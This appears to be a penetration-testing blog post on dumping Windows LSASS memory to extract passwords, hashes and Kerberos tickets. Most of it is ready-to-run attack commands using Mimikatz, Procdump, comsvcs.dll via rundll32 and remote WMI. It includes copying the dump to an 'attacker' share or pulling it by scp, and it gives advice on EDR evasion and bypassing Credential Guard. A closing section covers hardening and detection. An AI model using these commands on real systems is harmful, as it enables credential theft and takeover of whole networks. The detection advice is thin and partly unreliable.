Dumping LSASS Memory for Credential Extraction: Techniques and Tools

One of the most crucial steps in post-exploitation and privilege escalation is extracting credentials from the LSASS (Local Security Authority Subsystem Service) process on a Windows system. LSASS stores passwords, hashes, Kerberos tickets, and other sensitive data in memory.
Dumping LSASS memory is a common technique used by attackers to extract these credentials. However, modern Endpoint Detection and Response (EDR) solutions and Windows Defender actively monitor for such activities, making it essential to use advanced techniques and proper evasion methods.
1. What is LSASS?
Keyword: LSASS Memory Dump
LSASS is a process in Windows responsible for enforcing security policies and handling user authentication. The process is crucial as it stores:
- NTLM Hashes
- Kerberos Tickets
- Plaintext Passwords (in some cases)
- Cached Credentials
LSASS Process Location:
C:\Windows\System32\lsass.exe
2. Why Dump LSASS Memory?
Extracting credentials from LSASS can grant an attacker full control over the compromised system and even the entire Active Directory (AD) environment.
Common Attack Scenarios:
- Post-Exploitation: After gaining initial access to escalate privileges.
- Lateral Movement: To pivot to other systems on the network.
- Credential Dumping: To gather domain admin or local admin credentials.
3. Techniques to Dump LSASS Memory
3.1 Dumping via Mimikatz
Keyword: Mimikatz LSASS Dump
Mimikatz is a powerful post-exploitation tool capable of extracting credentials directly from memory.
Download and Execute Mimikatz:
Invoke-WebRequest -Uri "https://example.com/mimikatz.exe" -OutFile "C:\temp\mimikatz.exe"
Dump LSASS Memory with Mimikatz:
privilege::debug
sekurlsa::logonpasswords
Dump LSASS via MiniDump:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
3.2 Creating an LSASS Dump with Task Manager
Step 1: Open Task Manager
- Locate lsass.exe under Processes.
- Right-click and choose Create Dump File.
- The file will be saved at:
C:\Users\<Username>\AppData\Local\Temp
\lsass.DMP
Step 2: Transfer the Dump File
Copy the file to your attacking machine:
copy C:\Users\<Username>\AppData\Local\Temp\lsass.DMP \\attacker\share\
Step 3: Analyze the Dump with Mimikatz**
sekurlsa::minidump lsass.DMP
sekurlsa::logonpasswords
3.3 Using Procdump for LSASS Dumping
Keyword: Procdump LSASS Dump
Procdump is a Microsoft Sysinternals tool used for capturing process memory dumps. It is stealthier than Mimikatz as it looks like a legitimate system activity.
Step 1: Download Procdump
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "C:\temp\Procdump.zip"
Step 2: Extract and Execute
procdump.exe -ma lsass.exe C:\temp\lsass.dmp
Step 3: Analyze the Dump with Mimikatz**
sekurlsa::minidump C:\temp\lsass.dmp
sekurlsa::logonpasswords
3.4 Dumping LSASS Using comsvcs.dll
An alternative method to dump LSASS without using third-party tools:
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump lsass.exe C:\temp\lsass.dmp full
Advantages:
- Bypasses most EDR detections.
- Uses native Windows DLLs.
3.5 Remote LSASS Dump via WMI and PowerShell
Remote Dump Using WMI:
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "procdump.exe -ma lsass.exe C:\temp\lsass.dmp"
Remote File Transfer:
copy-item -path C:\temp\lsass.dmp -destination \\attacker\share\
4. Evasion Techniques and Anti-Detection
Keyword: LSASS Dump Evasion Techniques
4.1 Memory Injection Techniques
- Inject directly into trusted processes to mask malicious actions.
- Avoid spawning suspicious child processes.
4.2 Process Hollowing
Replace the memory space of a legitimate process with a payload, making detection harder.
4.3 Bypassing Credential Guard
Credential Guard is a Windows 10/11 and Server 2016+ feature that isolates LSASS. Use:
- Kernel Exploits: To disable Credential Guard.
- Direct Memory Access (DMA): Via hardware devices.
5. Analyzing LSASS Dump on an Attacker Machine
Transfer the dump to your Kali Linux or Windows analysis machine.
scp user@victim:/temp/lsass.dmp /opt/lsass.dmp
5.1 Using Mimikatz on Kali
mimikatz.exe "sekurlsa::minidump /opt/lsass.dmp" "sekurlsa::logonpasswords"
5.2 Analyzing with Volatility
volatility -f /opt/lsass.dmp --profile=Win10x64_1809 hashdump
6. How to Detect and Prevent LSASS Dumping
Keyword: LSASS Dump Prevention
6.1 Enabling Windows Defender and EDR
- Monitor processes that access lsass.exe.
- Use Advanced Threat Protection (ATP) to detect suspicious memory dumps.
6.2 Hardening LSASS Protection
Enable LSASS Protection Mode:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RunAsPPL" /t REG_DWORD /d "1"
/f
6.3 Implementing Credential Guard
Protect LSASS with Windows Defender Credential Guard to prevent memory dumping.
7. Detection Techniques for Blue Teams
Monitor Common Indicators:
- Event ID 4697: Service installation.
- Event ID 7045: New service creation.
- Event ID 4688: Process creation, especially from suspicious paths.
Use SIEM Solutions like Wazuh:
Set up alerts for unusual processes interacting with lsass.exe.
Conclusion
Dumping LSASS memory is a critical post-exploitation technique used by attackers to extract sensitive credentials from compromised systems. While tools like Mimikatz and Procdump are widely known, modern defense mechanisms demand more advanced and stealthy approaches.
By combining techniques like rundll32-based dumping, memory injection, and credential guard bypass, penetration testers can effectively demonstrate the risk of credential leakage. However, defenders must stay vigilant and implement LSASS hardening techniques to mitigate these risks.